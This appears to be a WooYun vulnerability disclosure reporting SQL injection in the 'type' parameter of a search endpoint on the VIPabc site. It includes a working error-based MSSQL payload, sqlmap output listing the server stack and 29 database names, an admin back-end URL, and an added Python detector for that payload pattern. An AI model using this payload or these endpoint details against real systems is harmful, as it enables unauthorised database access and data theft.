Vulnerability Summary

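Bug ID: wooyun-2013-046425

Title: SQL injection on the main site of VIPabc English Training

Vendor: VIPabc English Training

Author: caspar

Submitted: 2013-12-19 11:54

Fixed: 2014-02-02 11:54

Disclosed: 2014-02-02 11:54

Vulnerability type: SQL injection

Severity: Medium

Self-assessed Rank: 10

Status: Unable to contact the vendor, or the vendor actively ignored the report

Source: http://www.wooyun.org. For questions or help, contact [email protected]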


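Vulnerability Details

Disclosure status:

2013-12-19: Actively contacting the vendor and waiting for the vendor to claim the report; details not public
2014-02-02: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

SQL injection at an English training organization

Detailed description:

http://www.vipabc.com.cn/program/search/ajax_s_query_record.asp with the submitted parameters order=Grammar&type=&keyword=1&page=1
type is the injection point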

Place: POST
Parameter: type
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: order=Grammar&type=') AND 6713=CONVERT(INT,(SELECT CHAR(113)+CHAR(100)+CHAR(100)+CHAR(111)+CHAR(113)+(SELECT (CASE WHEN (6713=6713) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(97)+CHAR(99)+CHAR(116)+CHAR(113))) AND ('VVFH'='VVFH&keyword=1&page=1
---
[11:11:45] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft SQL Server 2008
[11:11:45] [INFO] fetching database names
[11:11:45] [INFO] the SQL query used returns 29 entries
available databases [29]:
[*] ABCJR
[*] AgentCloud
[*] AgentCloudApplication
[*] AnibalPerfMon
[*] ASPState
[*] CashFlow
[*] DBA007_performance
[*] EATE
[*] master
[*] model
[*] msdb
[*] muchnewdb
[*] Quest_Performance_Repository
[*] recruit
[*] ReportData
[*] snapshot_muchnewdb
[*] tempdb
[*] Tesol
[*] TRACE
[*] TutorCustomerServiceOnline
[*] TutorDefinition
[*] TutorGroup.Exam.App
[*] TutorGroup.Questionnaire
[*] TutorGroup.SmsPlatform
[*] TutorGroup.TutorAbc.Exam
[*] tutormeet_fms
[*] TutorReport
[*] TutorSummary
[*] VipEATE
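
An added example, not part of the original report: a log-side check that flags form-encoded POST bodies carrying the error-based MSSQL pattern seen in the sqlmap output above (a CONVERT(INT, ...) around a subquery, with CHAR(n)+CHAR(n) chains). The sample bodies are constructed, and the signature and function names are this example's own assumptions.

```python
import re
from urllib.parse import parse_qsl, unquote, urlencode

# Signatures modelled on the error-based MSSQL payload in the output above.
SIGNATURES = {
    # CONVERT(INT,(SELECT ...)) or CAST((SELECT ...) AS INT): forces a type error
    "convert_int_subquery": re.compile(
        r"\b(?:convert\s*\(\s*int\s*,|cast\s*\()\s*\(\s*select\b", re.I),
    # CHAR(n)+CHAR(n)+... : marker strings built without quotes
    "char_concat_chain": re.compile(r"(?:char\s*\(\s*\d+\s*\)\s*\+\s*){2,}", re.I),
    # a quote closing the string literal, then a boolean operator
    "quote_then_boolean": re.compile(r"'\s*\)?\s*(?:and|or)\b", re.I),
}

def normalise(value, max_passes=2):
    """Undo extra layers of percent-encoding (bounded), leaving '+' intact."""
    for _ in range(max_passes):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def scan_body(body):
    """Return {parameter: [signature names]} for a form-encoded POST body."""
    hits = {}
    for name, value in parse_qsl(body, keep_blank_values=True):
        value = normalise(value)
        matched = [sig for sig, rx in SIGNATURES.items() if rx.search(value)]
        if matched:
            hits.setdefault(name, []).extend(matched)
    return hits

# Constructed sample bodies (not captured traffic).
PROBE = "') AND 1=CONVERT(INT,(SELECT CHAR(113)+CHAR(100)+CHAR(113))) AND ('a'='a"
SAMPLES = [
    "order=Grammar&type=&keyword=1&page=1",                       # normal request
    urlencode({"order": "Grammar", "type": PROBE, "page": "1"}),  # probe in type
    urlencode({"order": "Grammar", "keyword": "rock 'n' roll and jazz"}),
]

if __name__ == "__main__":
    for body in SAMPLES:
        print(scan_body(body) or "clean", "<-", body[:60])
```

A match here is a triage signal for the logs; it does not replace fixing the query that consumes `type` with bound parameters.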

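Proof of vulnerability:

Did not dig deeper; see the detailed description. A few small extras:
http://www.vipabc.com/robots.txt
Admin back end: http://www.vipabc.com/backoffice/
over

Remediation:

You know what to do

Copyright notice: please credit the source when reposting: caspar@乌云


Vendor Response

Vendor response:

Unable to contact the vendor, or the vendor actively refused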